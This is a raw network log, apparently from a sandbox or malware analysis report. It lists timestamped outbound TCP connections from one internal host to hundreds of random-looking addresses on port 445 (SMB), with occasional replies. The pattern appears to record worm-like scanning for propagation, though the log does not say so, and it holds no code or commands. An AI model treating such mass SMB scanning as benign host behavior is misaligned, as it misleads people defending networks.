Apr 29, 2023 00:53:28.136418104 CEST	50861	445	192.168.2.4	113.162.38.193
Apr 29, 2023 00:53:28.355518103 CEST	50862	445	192.168.2.4	57.185.220.149
Apr 29, 2023 00:53:28.356128931 CEST	50863	445	192.168.2.4	100.45.84.17
Apr 29, 2023 00:53:28.401793957 CEST	50864	445	192.168.2.4	55.222.227.132
Apr 29, 2023 00:53:28.526730061 CEST	50865	445	192.168.2.4	189.197.14.93
Apr 29, 2023 00:53:28.526863098 CEST	50866	445	192.168.2.4	67.193.164.131
Apr 29, 2023 00:53:28.589540005 CEST	50867	445	192.168.2.4	182.12.40.104
Apr 29, 2023 00:53:28.605453968 CEST	50868	445	192.168.2.4	118.164.15.225
Apr 29, 2023 00:53:28.605642080 CEST	50869	445	192.168.2.4	117.166.150.38
Apr 29, 2023 00:53:28.605772972 CEST	50870	445	192.168.2.4	150.35.38.229
Apr 29, 2023 00:53:28.605937004 CEST	50871	445	192.168.2.4	10.248.188.91
Apr 29, 2023 00:53:28.606170893 CEST	50872	445	192.168.2.4	104.24.152.149
Apr 29, 2023 00:53:28.792623043 CEST	50873	445	192.168.2.4	105.202.97.238
Apr 29, 2023 00:53:28.792876959 CEST	50874	445	192.168.2.4	17.123.76.179
Apr 29, 2023 00:53:28.793067932 CEST	50875	445	192.168.2.4	88.168.142.173
Apr 29, 2023 00:53:28.793093920 CEST	50876	445	192.168.2.4	42.229.6.35
Apr 29, 2023 00:53:28.793430090 CEST	50877	445	192.168.2.4	9.234.7.197
Apr 29, 2023 00:53:28.901645899 CEST	50879	445	192.168.2.4	105.0.164.62
Apr 29, 2023 00:53:28.901654005 CEST	50878	445	192.168.2.4	66.66.54.5
Apr 29, 2023 00:53:28.917691946 CEST	50880	445	192.168.2.4	41.20.200.74
Apr 29, 2023 00:53:28.918128967 CEST	50881	445	192.168.2.4	188.26.39.239
Apr 29, 2023 00:53:28.918781996 CEST	50882	445	192.168.2.4	57.98.206.17
Apr 29, 2023 00:53:28.919454098 CEST	50883	445	192.168.2.4	192.18.135.91
Apr 29, 2023 00:53:28.919991016 CEST	50884	445	192.168.2.4	123.73.211.53
Apr 29, 2023 00:53:28.920454979 CEST	50885	445	192.168.2.4	97.245.115.174
Apr 29, 2023 00:53:28.920957088 CEST	50886	445	192.168.2.4	134.51.207.6
Apr 29, 2023 00:53:29.043694019 CEST	50887	445	192.168.2.4	37.174.95.62
Apr 29, 2023 00:53:29.089373112 CEST	50888	445	192.168.2.4	176.232.248.223
Apr 29, 2023 00:53:29.089373112 CEST	50889	445	192.168.2.4	2.162.95.65
Apr 29, 2023 00:53:29.089500904 CEST	50890	445	192.168.2.4	219.238.230.23
Apr 29, 2023 00:53:29.213963032 CEST	50891	445	192.168.2.4	34.111.108.223
Apr 29, 2023 00:53:29.261569023 CEST	50892	445	192.168.2.4	80.165.203.62
Apr 29, 2023 00:53:29.261574984 CEST	50893	445	192.168.2.4	185.55.105.216
Apr 29, 2023 00:53:29.479643106 CEST	50894	445	192.168.2.4	64.100.173.29
Apr 29, 2023 00:53:29.479675055 CEST	50895	445	192.168.2.4	27.212.214.184
Apr 29, 2023 00:53:29.511164904 CEST	50896	445	192.168.2.4	175.43.228.147
Apr 29, 2023 00:53:29.636459112 CEST	50898	445	192.168.2.4	183.121.239.208
Apr 29, 2023 00:53:29.636482000 CEST	50897	445	192.168.2.4	37.119.159.194
Apr 29, 2023 00:53:29.714008093 CEST	50899	445	192.168.2.4	103.98.82.53
Apr 29, 2023 00:53:29.729827881 CEST	50900	445	192.168.2.4	183.30.131.151
Apr 29, 2023 00:53:29.730182886 CEST	50901	445	192.168.2.4	164.166.239.27
Apr 29, 2023 00:53:29.730398893 CEST	50902	445	192.168.2.4	98.99.157.139
Apr 29, 2023 00:53:29.730489969 CEST	50903	445	192.168.2.4	11.61.86.243
Apr 29, 2023 00:53:29.730648994 CEST	50904	445	192.168.2.4	196.233.30.3
Apr 29, 2023 00:53:29.919104099 CEST	50905	445	192.168.2.4	172.98.25.63
Apr 29, 2023 00:53:29.919317961 CEST	50906	445	192.168.2.4	110.216.147.87
Apr 29, 2023 00:53:29.927793980 CEST	50907	445	192.168.2.4	146.180.100.142
Apr 29, 2023 00:53:29.927861929 CEST	50908	445	192.168.2.4	98.32.78.49
Apr 29, 2023 00:53:29.928242922 CEST	50909	445	192.168.2.4	19.180.199.115
Apr 29, 2023 00:53:30.063904047 CEST	50911	445	192.168.2.4	95.61.133.67
Apr 29, 2023 00:53:30.064507961 CEST	50912	445	192.168.2.4	5.103.100.40
Apr 29, 2023 00:53:30.065053940 CEST	50913	445	192.168.2.4	180.42.70.15
Apr 29, 2023 00:53:30.065155983 CEST	50914	445	192.168.2.4	28.91.207.64
Apr 29, 2023 00:53:30.066126108 CEST	50915	445	192.168.2.4	119.80.197.92
Apr 29, 2023 00:53:30.066953897 CEST	50916	445	192.168.2.4	53.164.0.42
Apr 29, 2023 00:53:30.067006111 CEST	50917	445	192.168.2.4	22.117.244.55
Apr 29, 2023 00:53:30.067078114 CEST	50918	445	192.168.2.4	125.86.64.5
Apr 29, 2023 00:53:30.067118883 CEST	50919	445	192.168.2.4	198.241.214.236
Apr 29, 2023 00:53:30.167169094 CEST	50920	445	192.168.2.4	93.187.217.248
Apr 29, 2023 00:53:30.214119911 CEST	50921	445	192.168.2.4	54.202.92.216
Apr 29, 2023 00:53:30.214260101 CEST	50922	445	192.168.2.4	95.195.25.114
Apr 29, 2023 00:53:30.214397907 CEST	50923	445	192.168.2.4	135.153.59.133
Apr 29, 2023 00:53:30.323497057 CEST	50924	445	192.168.2.4	164.246.37.178
Apr 29, 2023 00:53:30.385926962 CEST	50925	445	192.168.2.4	160.111.60.83
Apr 29, 2023 00:53:30.386065006 CEST	50926	445	192.168.2.4	204.187.122.21
Apr 29, 2023 00:53:30.604912043 CEST	50927	445	192.168.2.4	166.68.95.152
Apr 29, 2023 00:53:30.605143070 CEST	50928	445	192.168.2.4	104.206.4.11
Apr 29, 2023 00:53:30.635950089 CEST	50929	445	192.168.2.4	109.36.222.45
Apr 29, 2023 00:53:30.761446953 CEST	50930	445	192.168.2.4	24.52.155.9
Apr 29, 2023 00:53:30.761739016 CEST	50931	445	192.168.2.4	96.100.54.138
Apr 29, 2023 00:53:30.823417902 CEST	50932	445	192.168.2.4	183.68.56.118
Apr 29, 2023 00:53:30.840338945 CEST	50933	445	192.168.2.4	209.49.223.3
Apr 29, 2023 00:53:30.840481043 CEST	50934	445	192.168.2.4	79.250.21.131
Apr 29, 2023 00:53:30.840678930 CEST	50935	445	192.168.2.4	5.54.56.55
Apr 29, 2023 00:53:30.840833902 CEST	50936	445	192.168.2.4	6.130.193.248
Apr 29, 2023 00:53:30.840971947 CEST	50937	445	192.168.2.4	76.151.5.64
Apr 29, 2023 00:53:30.920974970 CEST	445	50797	178.160.3.187	192.168.2.4
Apr 29, 2023 00:53:31.042347908 CEST	50938	445	192.168.2.4	35.236.19.241
Apr 29, 2023 00:53:31.042470932 CEST	50939	445	192.168.2.4	156.94.72.134
Apr 29, 2023 00:53:31.042490005 CEST	50940	445	192.168.2.4	176.124.138.69
Apr 29, 2023 00:53:31.042592049 CEST	50941	445	192.168.2.4	72.49.59.32
Apr 29, 2023 00:53:31.042680979 CEST	50942	445	192.168.2.4	104.95.217.10
Apr 29, 2023 00:53:31.167839050 CEST	50944	445	192.168.2.4	150.28.43.186
Apr 29, 2023 00:53:31.168549061 CEST	50945	445	192.168.2.4	24.47.37.226
Apr 29, 2023 00:53:31.168912888 CEST	50946	445	192.168.2.4	96.171.198.115
Apr 29, 2023 00:53:31.169225931 CEST	50947	445	192.168.2.4	120.6.254.110
Apr 29, 2023 00:53:31.169838905 CEST	50948	445	192.168.2.4	161.44.62.218
Apr 29, 2023 00:53:31.171300888 CEST	50949	445	192.168.2.4	11.63.24.154
Apr 29, 2023 00:53:31.171909094 CEST	50950	445	192.168.2.4	195.208.248.27
Apr 29, 2023 00:53:31.171993017 CEST	50951	445	192.168.2.4	47.69.71.12
Apr 29, 2023 00:53:31.172188044 CEST	50952	445	192.168.2.4	200.178.158.74
Apr 29, 2023 00:53:31.292457104 CEST	50953	445	192.168.2.4	168.227.25.190
Apr 29, 2023 00:53:31.340194941 CEST	50954	445	192.168.2.4	7.85.77.63
Apr 29, 2023 00:53:31.340435028 CEST	50955	445	192.168.2.4	27.1.203.77
Apr 29, 2023 00:53:31.340926886 CEST	50956	445	192.168.2.4	210.206.58.156
Apr 29, 2023 00:53:31.452280045 CEST	50957	445	192.168.2.4	14.17.109.186
Apr 29, 2023 00:53:31.495744944 CEST	50958	445	192.168.2.4	216.207.179.5
Apr 29, 2023 00:53:31.496083021 CEST	50959	445	192.168.2.4	89.73.83.172
Apr 29, 2023 00:53:31.714523077 CEST	50960	445	192.168.2.4	220.77.12.122
Apr 29, 2023 00:53:31.714821100 CEST	50961	445	192.168.2.4	160.48.95.179
Apr 29, 2023 00:53:31.761590958 CEST	50962	445	192.168.2.4	93.180.148.158
Apr 29, 2023 00:53:31.871011019 CEST	50963	445	192.168.2.4	5.110.198.225
Apr 29, 2023 00:53:31.871170044 CEST	50964	445	192.168.2.4	208.153.177.227
Apr 29, 2023 00:53:31.933264971 CEST	50965	445	192.168.2.4	213.133.205.75
Apr 29, 2023 00:53:31.948641062 CEST	50966	445	192.168.2.4	199.177.166.64
Apr 29, 2023 00:53:31.948820114 CEST	50967	445	192.168.2.4	215.108.26.125
Apr 29, 2023 00:53:31.948993921 CEST	50968	445	192.168.2.4	68.142.128.149
Apr 29, 2023 00:53:31.949130058 CEST	50969	445	192.168.2.4	218.190.95.82
Apr 29, 2023 00:53:31.949364901 CEST	50970	445	192.168.2.4	3.6.10.81
Apr 29, 2023 00:53:32.151983023 CEST	50972	445	192.168.2.4	86.135.89.242
Apr 29, 2023 00:53:32.152303934 CEST	50973	445	192.168.2.4	177.67.67.202
Apr 29, 2023 00:53:32.152568102 CEST	50974	445	192.168.2.4	23.143.230.9
Apr 29, 2023 00:53:32.152719021 CEST	50975	445	192.168.2.4	94.235.168.214
Apr 29, 2023 00:53:32.153192043 CEST	50976	445	192.168.2.4	26.92.124.35
Apr 29, 2023 00:53:32.278270006 CEST	50978	445	192.168.2.4	6.148.140.53
Apr 29, 2023 00:53:32.279675961 CEST	50979	445	192.168.2.4	142.146.166.154
Apr 29, 2023 00:53:32.281974077 CEST	50980	445	192.168.2.4	142.188.213.246
Apr 29, 2023 00:53:32.283746004 CEST	50981	445	192.168.2.4	50.138.83.54
Apr 29, 2023 00:53:32.284526110 CEST	50982	445	192.168.2.4	205.145.165.192
Apr 29, 2023 00:53:32.285089016 CEST	50983	445	192.168.2.4	89.23.107.211
Apr 29, 2023 00:53:32.285279989 CEST	50984	445	192.168.2.4	61.250.140.223
Apr 29, 2023 00:53:32.286290884 CEST	50985	445	192.168.2.4	140.196.236.144
Apr 29, 2023 00:53:32.287581921 CEST	50986	445	192.168.2.4	101.50.119.0
Apr 29, 2023 00:53:32.417911053 CEST	50987	445	192.168.2.4	35.65.200.146
Apr 29, 2023 00:53:32.464464903 CEST	50989	445	192.168.2.4	45.38.4.193
Apr 29, 2023 00:53:32.464495897 CEST	50988	445	192.168.2.4	150.202.236.95
Apr 29, 2023 00:53:32.464740038 CEST	50990	445	192.168.2.4	140.241.238.235
Apr 29, 2023 00:53:32.573745966 CEST	50991	445	192.168.2.4	138.90.99.213
Apr 29, 2023 00:53:32.608350039 CEST	50993	445	192.168.2.4	152.150.140.83
Apr 29, 2023 00:53:32.608360052 CEST	50992	445	192.168.2.4	63.31.229.232
Apr 29, 2023 00:53:32.839967012 CEST	50994	445	192.168.2.4	214.234.224.148
Apr 29, 2023 00:53:32.840581894 CEST	50995	445	192.168.2.4	67.188.199.24
Apr 29, 2023 00:53:32.889570951 CEST	50996	445	192.168.2.4	70.125.228.216
Apr 29, 2023 00:53:32.982187986 CEST	50998	445	192.168.2.4	163.195.143.194
Apr 29, 2023 00:53:32.982187986 CEST	50997	445	192.168.2.4	77.245.226.170
Apr 29, 2023 00:53:33.058609962 CEST	50999	445	192.168.2.4	170.185.175.191
Apr 29, 2023 00:53:33.074451923 CEST	51000	445	192.168.2.4	58.91.19.32
Apr 29, 2023 00:53:33.074456930 CEST	51002	445	192.168.2.4	44.154.213.83
Apr 29, 2023 00:53:33.074687004 CEST	51003	445	192.168.2.4	84.182.180.108
Apr 29, 2023 00:53:33.074856997 CEST	51004	445	192.168.2.4	139.30.101.146
Apr 29, 2023 00:53:33.075016975 CEST	51005	445	192.168.2.4	170.27.36.212
Apr 29, 2023 00:53:33.277240038 CEST	51006	445	192.168.2.4	50.226.222.211
Apr 29, 2023 00:53:33.277465105 CEST	51007	445	192.168.2.4	10.76.221.183
Apr 29, 2023 00:53:33.277723074 CEST	51008	445	192.168.2.4	137.134.232.14
Apr 29, 2023 00:53:33.278038025 CEST	51009	445	192.168.2.4	208.172.137.249
Apr 29, 2023 00:53:33.278311968 CEST	51010	445	192.168.2.4	194.117.42.185
Apr 29, 2023 00:53:33.402483940 CEST	51012	445	192.168.2.4	10.43.21.82
Apr 29, 2023 00:53:33.402504921 CEST	51013	445	192.168.2.4	184.227.57.92
Apr 29, 2023 00:53:33.421920061 CEST	51014	445	192.168.2.4	38.64.114.108
Apr 29, 2023 00:53:33.424685001 CEST	51015	445	192.168.2.4	101.141.9.104
Apr 29, 2023 00:53:33.424779892 CEST	51016	445	192.168.2.4	175.30.205.168
Apr 29, 2023 00:53:33.424779892 CEST	51017	445	192.168.2.4	156.73.123.129
Apr 29, 2023 00:53:33.424823046 CEST	51018	445	192.168.2.4	189.69.147.197
Apr 29, 2023 00:53:33.424922943 CEST	51019	445	192.168.2.4	203.226.37.231
Apr 29, 2023 00:53:33.424997091 CEST	51020	445	192.168.2.4	71.199.86.251
Apr 29, 2023 00:53:33.542439938 CEST	51021	445	192.168.2.4	183.141.43.60
Apr 29, 2023 00:53:33.589694977 CEST	51022	445	192.168.2.4	13.110.42.192
Apr 29, 2023 00:53:33.589713097 CEST	51023	445	192.168.2.4	3.202.248.5
Apr 29, 2023 00:53:33.589818001 CEST	51024	445	192.168.2.4	124.75.201.248
Apr 29, 2023 00:53:33.699197054 CEST	51025	445	192.168.2.4	220.218.171.31
Apr 29, 2023 00:53:33.730570078 CEST	51026	445	192.168.2.4	218.118.22.12
Apr 29, 2023 00:53:33.730582952 CEST	51027	445	192.168.2.4	8.158.68.97
Apr 29, 2023 00:53:33.949707985 CEST	51028	445	192.168.2.4	135.113.200.160
Apr 29, 2023 00:53:33.949711084 CEST	51029	445	192.168.2.4	211.138.102.82
Apr 29, 2023 00:53:34.011476994 CEST	51031	445	192.168.2.4	14.189.116.199
Apr 29, 2023 00:53:34.105061054 CEST	51032	445	192.168.2.4	44.152.52.193
Apr 29, 2023 00:53:34.105101109 CEST	51033	445	192.168.2.4	51.144.131.69
Apr 29, 2023 00:53:34.189305067 CEST	51034	445	192.168.2.4	3.185.1.17
Apr 29, 2023 00:53:34.189342976 CEST	51035	445	192.168.2.4	222.61.52.102
Apr 29, 2023 00:53:34.189701080 CEST	51036	445	192.168.2.4	178.30.20.159
Apr 29, 2023 00:53:34.189903021 CEST	51037	445	192.168.2.4	122.246.13.62
Apr 29, 2023 00:53:34.190116882 CEST	51039	445	192.168.2.4	21.21.76.6
Apr 29, 2023 00:53:34.190308094 CEST	51040	445	192.168.2.4	30.41.75.23
Apr 29, 2023 00:53:34.386555910 CEST	51041	445	192.168.2.4	71.78.208.66
Apr 29, 2023 00:53:34.386888981 CEST	51042	445	192.168.2.4	151.65.113.71
Apr 29, 2023 00:53:34.387192965 CEST	51043	445	192.168.2.4	111.244.66.101
Apr 29, 2023 00:53:34.387512922 CEST	51044	445	192.168.2.4	210.224.125.172
Apr 29, 2023 00:53:34.387841940 CEST	51045	445	192.168.2.4	30.95.0.86
Apr 29, 2023 00:53:34.526912928 CEST	51047	445	192.168.2.4	183.100.100.242
Apr 29, 2023 00:53:34.526927948 CEST	51048	445	192.168.2.4	58.60.57.195
Apr 29, 2023 00:53:34.546422005 CEST	51049	445	192.168.2.4	138.196.204.215
Apr 29, 2023 00:53:34.546449900 CEST	51050	445	192.168.2.4	41.223.145.4
Apr 29, 2023 00:53:34.546650887 CEST	51051	445	192.168.2.4	204.5.47.34
Apr 29, 2023 00:53:34.546681881 CEST	51052	445	192.168.2.4	8.27.182.54
Apr 29, 2023 00:53:34.546818018 CEST	51053	445	192.168.2.4	65.61.175.134
Apr 29, 2023 00:53:34.546909094 CEST	51054	445	192.168.2.4	155.233.78.222
Apr 29, 2023 00:53:34.546998024 CEST	51055	445	192.168.2.4	27.143.188.86
Apr 29, 2023 00:53:34.651973009 CEST	51056	445	192.168.2.4	191.119.32.84
Apr 29, 2023 00:53:34.714534998 CEST	51057	445	192.168.2.4	161.39.0.92
Apr 29, 2023 00:53:34.714680910 CEST	51058	445	192.168.2.4	41.45.65.208
Apr 29, 2023 00:53:34.714890003 CEST	51059	445	192.168.2.4	185.200.210.209
Apr 29, 2023 00:53:34.823945045 CEST	51060	445	192.168.2.4	3.250.165.119
Apr 29, 2023 00:53:34.856213093 CEST	51062	445	192.168.2.4	198.55.40.229
Apr 29, 2023 00:53:34.856221914 CEST	51061	445	192.168.2.4	191.225.152.25
Apr 29, 2023 00:53:35.073801994 CEST	51064	445	192.168.2.4	35.124.237.181
Apr 29, 2023 00:53:35.073836088 CEST	51063	445	192.168.2.4	200.175.126.113
Apr 29, 2023 00:53:35.136394024 CEST	51066	445	192.168.2.4	39.75.29.84
Apr 29, 2023 00:53:35.230073929 CEST	51067	445	192.168.2.4	121.171.141.7
Apr 29, 2023 00:53:35.230163097 CEST	51068	445	192.168.2.4	101.9.80.182
Apr 29, 2023 00:53:35.308237076 CEST	51069	445	192.168.2.4	139.143.84.178
Apr 29, 2023 00:53:35.308311939 CEST	51070	445	192.168.2.4	121.169.90.113
Apr 29, 2023 00:53:35.308532000 CEST	51071	445	192.168.2.4	19.218.198.224
Apr 29, 2023 00:53:35.308598042 CEST	51072	445	192.168.2.4	76.234.197.187
Apr 29, 2023 00:53:35.308727026 CEST	51074	445	192.168.2.4	198.205.229.28
Apr 29, 2023 00:53:35.308912992 CEST	51075	445	192.168.2.4	214.105.49.118
Apr 29, 2023 00:53:35.519268990 CEST	51076	445	192.168.2.4	58.23.94.232
Apr 29, 2023 00:53:35.519352913 CEST	51077	445	192.168.2.4	10.173.58.192
Apr 29, 2023 00:53:35.519509077 CEST	51079	445	192.168.2.4	73.110.109.21
Apr 29, 2023 00:53:35.519556046 CEST	51078	445	192.168.2.4	134.34.203.199
Apr 29, 2023 00:53:35.519733906 CEST	51080	445	192.168.2.4	116.186.172.218
Apr 29, 2023 00:53:35.652621984 CEST	51082	445	192.168.2.4	81.178.221.182
Apr 29, 2023 00:53:35.652630091 CEST	51083	445	192.168.2.4	198.114.186.72
Apr 29, 2023 00:53:35.665429115 CEST	445	50929	109.36.222.45	192.168.2.4
Apr 29, 2023 00:53:35.669883966 CEST	51084	445	192.168.2.4	29.189.44.172
Apr 29, 2023 00:53:35.669920921 CEST	51085	445	192.168.2.4	156.18.11.241
Apr 29, 2023 00:53:35.670080900 CEST	51086	445	192.168.2.4	149.87.213.24
Apr 29, 2023 00:53:35.670142889 CEST	51087	445	192.168.2.4	150.2.245.193
Apr 29, 2023 00:53:35.670169115 CEST	51088	445	192.168.2.4	139.196.133.108
Apr 29, 2023 00:53:35.670248985 CEST	51089	445	192.168.2.4	144.186.225.185
Apr 29, 2023 00:53:35.670311928 CEST	51090	445	192.168.2.4	177.60.115.129
Apr 29, 2023 00:53:35.761595964 CEST	51091	445	192.168.2.4	51.50.122.5
Apr 29, 2023 00:53:35.841334105 CEST	51093	445	192.168.2.4	178.192.82.49
Apr 29, 2023 00:53:35.841335058 CEST	51092	445	192.168.2.4	50.225.97.37
Apr 29, 2023 00:53:35.841519117 CEST	51094	445	192.168.2.4	194.118.147.200
Apr 29, 2023 00:53:35.948911905 CEST	51095	445	192.168.2.4	145.73.136.176
Apr 29, 2023 00:53:35.980674982 CEST	51096	445	192.168.2.4	102.225.102.105
Apr 29, 2023 00:53:35.980684042 CEST	51097	445	192.168.2.4	148.84.213.202
Apr 29, 2023 00:53:36.183320045 CEST	51099	445	192.168.2.4	166.206.192.179
Apr 29, 2023 00:53:36.183480024 CEST	51100	445	192.168.2.4	212.133.10.213
Apr 29, 2023 00:53:36.245884895 CEST	51102	445	192.168.2.4	169.205.78.108
Apr 29, 2023 00:53:36.339894056 CEST	51104	445	192.168.2.4	185.159.114.100
Apr 29, 2023 00:53:36.339895010 CEST	51103	445	192.168.2.4	87.29.162.192
Apr 29, 2023 00:53:36.417814970 CEST	51105	445	192.168.2.4	134.252.127.206
Apr 29, 2023 00:53:36.418112993 CEST	51106	445	192.168.2.4	54.86.229.158
Apr 29, 2023 00:53:36.418332100 CEST	51107	445	192.168.2.4	154.105.64.216
Apr 29, 2023 00:53:36.418473959 CEST	51108	445	192.168.2.4	126.206.94.140
Apr 29, 2023 00:53:36.418720007 CEST	51110	445	192.168.2.4	198.123.200.117
Apr 29, 2023 00:53:36.418987036 CEST	51111	445	192.168.2.4	176.247.13.28
Apr 29, 2023 00:53:36.488800049 CEST	445	51104	185.159.114.100	192.168.2.4
Apr 29, 2023 00:53:36.636821032 CEST	51112	445	192.168.2.4	200.25.167.6
Apr 29, 2023 00:53:36.636827946 CEST	51113	445	192.168.2.4	2.173.76.127
Apr 29, 2023 00:53:36.636970997 CEST	51114	445	192.168.2.4	13.146.82.65
Apr 29, 2023 00:53:36.637139082 CEST	51115	445	192.168.2.4	82.215.191.61
Apr 29, 2023 00:53:36.637404919 CEST	51116	445	192.168.2.4	92.244.249.54
Apr 29, 2023 00:53:36.777255058 CEST	51119	445	192.168.2.4	152.181.157.119
Apr 29, 2023 00:53:36.777307987 CEST	51118	445	192.168.2.4	179.241.88.242
Apr 29, 2023 00:53:36.793539047 CEST	51120	445	192.168.2.4	58.126.46.238
Apr 29, 2023 00:53:36.796644926 CEST	51121	445	192.168.2.4	168.58.63.248
Apr 29, 2023 00:53:36.798404932 CEST	51122	445	192.168.2.4	205.155.161.148
Apr 29, 2023 00:53:36.799293041 CEST	51123	445	192.168.2.4	223.52.184.145
Apr 29, 2023 00:53:36.802021980 CEST	51124	445	192.168.2.4	64.200.24.35
Apr 29, 2023 00:53:36.803191900 CEST	51125	445	192.168.2.4	79.217.165.185
Apr 29, 2023 00:53:36.804438114 CEST	51126	445	192.168.2.4	190.171.13.19
Apr 29, 2023 00:53:36.886627913 CEST	51127	445	192.168.2.4	4.80.48.212
Apr 29, 2023 00:53:36.965239048 CEST	51128	445	192.168.2.4	129.100.119.129
Apr 29, 2023 00:53:36.965533018 CEST	51129	445	192.168.2.4	177.26.162.107
Apr 29, 2023 00:53:36.966281891 CEST	51130	445	192.168.2.4	217.109.242.235
Apr 29, 2023 00:53:36.995651960 CEST	51104	445	192.168.2.4	185.159.114.100
Apr 29, 2023 00:53:37.074093103 CEST	51131	445	192.168.2.4	43.134.245.113
Apr 29, 2023 00:53:37.105842113 CEST	51133	445	192.168.2.4	205.252.91.182
Apr 29, 2023 00:53:37.105850935 CEST	51134	445	192.168.2.4	179.201.134.209
Apr 29, 2023 00:53:37.295474052 CEST	51135	445	192.168.2.4	221.193.202.229
Apr 29, 2023 00:53:37.296132088 CEST	51136	445	192.168.2.4	84.76.176.184
Apr 29, 2023 00:53:37.371649027 CEST	51138	445	192.168.2.4	111.123.199.1
Apr 29, 2023 00:53:37.449354887 CEST	51139	445	192.168.2.4	134.79.133.16
Apr 29, 2023 00:53:37.449377060 CEST	51140	445	192.168.2.4	71.61.74.211
Apr 29, 2023 00:53:37.527842999 CEST	51142	445	192.168.2.4	190.212.123.143
Apr 29, 2023 00:53:37.527853012 CEST	51141	445	192.168.2.4	214.200.123.165
Apr 29, 2023 00:53:37.528027058 CEST	51143	445	192.168.2.4	153.49.124.223
Apr 29, 2023 00:53:37.528650045 CEST	51144	445	192.168.2.4	60.77.104.66
Apr 29, 2023 00:53:37.529081106 CEST	51146	445	192.168.2.4	170.129.77.201
Apr 29, 2023 00:53:37.529531002 CEST	51147	445	192.168.2.4	83.20.50.148
Apr 29, 2023 00:53:37.746182919 CEST	51148	445	192.168.2.4	166.25.193.252
Apr 29, 2023 00:53:37.746242046 CEST	51149	445	192.168.2.4	138.101.128.245
Apr 29, 2023 00:53:37.746459007 CEST	51150	445	192.168.2.4	186.102.30.43
Apr 29, 2023 00:53:37.746625900 CEST	51152	445	192.168.2.4	14.146.18.196
Apr 29, 2023 00:53:37.746814966 CEST	51151	445	192.168.2.4	39.210.141.246
Apr 29, 2023 00:53:37.909184933 CEST	51154	445	192.168.2.4	86.239.251.92
Apr 29, 2023 00:53:37.909351110 CEST	51155	445	192.168.2.4	221.114.42.222
Apr 29, 2023 00:53:37.920392036 CEST	51156	445	192.168.2.4	85.180.181.227
Apr 29, 2023 00:53:37.920595884 CEST	51158	445	192.168.2.4	158.175.85.66
Apr 29, 2023 00:53:37.920708895 CEST	51159	445	192.168.2.4	220.17.253.247
Apr 29, 2023 00:53:37.920727015 CEST	51160	445	192.168.2.4	217.223.9.9
Apr 29, 2023 00:53:37.920790911 CEST	51161	445	192.168.2.4	203.20.93.113
Apr 29, 2023 00:53:37.921063900 CEST	51162	445	192.168.2.4	115.233.40.120
Apr 29, 2023 00:53:38.011950970 CEST	51164	445	192.168.2.4	66.81.194.150
Apr 29, 2023 00:53:38.074376106 CEST	51165	445	192.168.2.4	120.11.151.135
Apr 29, 2023 00:53:38.074697018 CEST	51166	445	192.168.2.4	168.4.155.22
Apr 29, 2023 00:53:38.074965000 CEST	51167	445	192.168.2.4	161.79.86.61
Apr 29, 2023 00:53:38.132505894 CEST	445	51104	185.159.114.100	192.168.2.4
Apr 29, 2023 00:53:38.187613010 CEST	51168	445	192.168.2.4	218.81.60.1
Apr 29, 2023 00:53:38.216490984 CEST	51170	445	192.168.2.4	202.27.201.221
Apr 29, 2023 00:53:38.216495037 CEST	51171	445	192.168.2.4	116.50.125.188
Apr 29, 2023 00:53:38.418040037 CEST	51172	445	192.168.2.4	11.124.139.182
Apr 29, 2023 00:53:38.418198109 CEST	51173	445	192.168.2.4	124.112.217.0
Apr 29, 2023 00:53:38.496704102 CEST	51175	445	192.168.2.4	18.251.69.209
Apr 29, 2023 00:53:38.574338913 CEST	51176	445	192.168.2.4	118.92.28.70
Apr 29, 2023 00:53:38.574575901 CEST	51177	445	192.168.2.4	34.207.1.210
Apr 29, 2023 00:53:38.652673960 CEST	51178	445	192.168.2.4	76.176.211.247
Apr 29, 2023 00:53:38.652802944 CEST	51179	445	192.168.2.4	50.4.45.173
Apr 29, 2023 00:53:38.652905941 CEST	51180	445	192.168.2.4	84.53.70.4
Apr 29, 2023 00:53:38.653105021 CEST	51181	445	192.168.2.4	113.85.81.141
Apr 29, 2023 00:53:38.653434038 CEST	51183	445	192.168.2.4	146.182.117.76
Apr 29, 2023 00:53:38.653582096 CEST	51184	445	192.168.2.4	15.105.243.129
Apr 29, 2023 00:53:38.872566938 CEST	51185	445	192.168.2.4	45.247.242.94
Apr 29, 2023 00:53:38.873028040 CEST	51186	445	192.168.2.4	27.25.133.243
Apr 29, 2023 00:53:38.880494118 CEST	51187	445	192.168.2.4	90.216.11.130
Apr 29, 2023 00:53:38.880909920 CEST	51188	445	192.168.2.4	148.53.131.100
Apr 29, 2023 00:53:38.881238937 CEST	51189	445	192.168.2.4	14.39.0.20
Apr 29, 2023 00:53:39.012099981 CEST	51192	445	192.168.2.4	110.191.165.221
Apr 29, 2023 00:53:39.013492107 CEST	51191	445	192.168.2.4	28.227.164.9
Apr 29, 2023 00:53:39.029190063 CEST	51193	445	192.168.2.4	19.13.55.239
Apr 29, 2023 00:53:39.029373884 CEST	51195	445	192.168.2.4	102.131.64.201
Apr 29, 2023 00:53:39.029373884 CEST	51194	445	192.168.2.4	157.207.183.217
Apr 29, 2023 00:53:39.029432058 CEST	51196	445	192.168.2.4	40.104.182.119
Apr 29, 2023 00:53:39.029520035 CEST	51198	445	192.168.2.4	172.25.158.244
Apr 29, 2023 00:53:39.029551983 CEST	51197	445	192.168.2.4	154.219.129.164
Apr 29, 2023 00:53:39.029606104 CEST	51199	445	192.168.2.4	145.60.242.54
Apr 29, 2023 00:53:39.136698008 CEST	51201	445	192.168.2.4	85.171.111.138
Apr 29, 2023 00:53:39.199832916 CEST	51202	445	192.168.2.4	109.219.4.188
Apr 29, 2023 00:53:39.199834108 CEST	51203	445	192.168.2.4	82.91.121.91
Apr 29, 2023 00:53:39.200052977 CEST	51204	445	192.168.2.4	22.115.88.144
Apr 29, 2023 00:53:39.308639050 CEST	51205	445	192.168.2.4	6.74.108.28
Apr 29, 2023 00:53:39.339724064 CEST	51207	445	192.168.2.4	79.111.190.160
Apr 29, 2023 00:53:39.339869022 CEST	51208	445	192.168.2.4	176.217.91.242
Apr 29, 2023 00:53:39.543351889 CEST	51209	445	192.168.2.4	147.151.42.79
Apr 29, 2023 00:53:39.543564081 CEST	51210	445	192.168.2.4	63.32.23.210
Apr 29, 2023 00:53:39.621387005 CEST	51212	445	192.168.2.4	102.179.200.120
Apr 29, 2023 00:53:39.683712006 CEST	51213	445	192.168.2.4	57.226.18.91
Apr 29, 2023 00:53:39.683819056 CEST	51214	445	192.168.2.4	180.56.116.117
Apr 29, 2023 00:53:39.762166023 CEST	51215	445	192.168.2.4	129.138.138.59
Apr 29, 2023 00:53:39.762346983 CEST	51216	445	192.168.2.4	40.249.77.19
Apr 29, 2023 00:53:39.762473106 CEST	51217	445	192.168.2.4	14.34.118.138
